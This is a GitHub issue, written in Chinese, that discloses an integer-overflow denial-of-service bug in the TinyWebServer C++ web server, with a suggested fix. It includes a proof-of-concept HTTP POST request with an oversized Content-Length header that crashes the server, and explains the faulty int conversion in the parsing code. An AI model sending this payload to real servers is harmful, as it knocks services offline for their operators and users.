search

qinguoyi / TinyWebServer

:fire: Linux下C++轻量级WebServer服务器
Apache License 2.0
15.85k stars 3.81k forks source link

整数溢出导致拒绝服务漏洞 #201

Closed ek1ng closed 1 year ago

ek1ng commented 1 year ago

POC

server发送如下http请求

POST / HTTP/1.1
Host: 127.0.0.1:9006
User-Agent: curl/7.68.0
Accept: */*
Content-Length:0221202434513

......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

进程会crash

image-20230228151641295

漏洞原理

http_conn.h 

int m_content_length;

这里将m_content_length初始化成int。

http_conn.cpp

m_content_length = atol(text);

Content-Length请求头中的值比较大时,m_content_length会被当成long读进来然后转换成int,例如上面payload中的0221202434513,十六进制值为0x3380b149d1,转换成int后截断8位,为0x80b149d1,是个负数。

http_conn.cpp

http_conn::HTTP_CODE http_conn::parse_content(char *text)
{
    if (m_read_idx >= (m_content_length + m_checked_idx))
    {
        text[m_content_length] = '\0';
        //POST请求中最后为输入的用户名和密码
        m_string = text;
        return GET_REQUEST;
    }
    return NO_REQUEST;
}

text[m_content_length] = '\0';m_content_length是一个比较大的负数,超出了堆空间的大小,当访问到无权限的地址时会导致crash

修复意见

http_conn.h中将m_read_idx,m_content_length,m_checked_idx初始化为long类型。

zhangm365 commented 1 year ago

这种情况是报文内容太长的场景发生的吗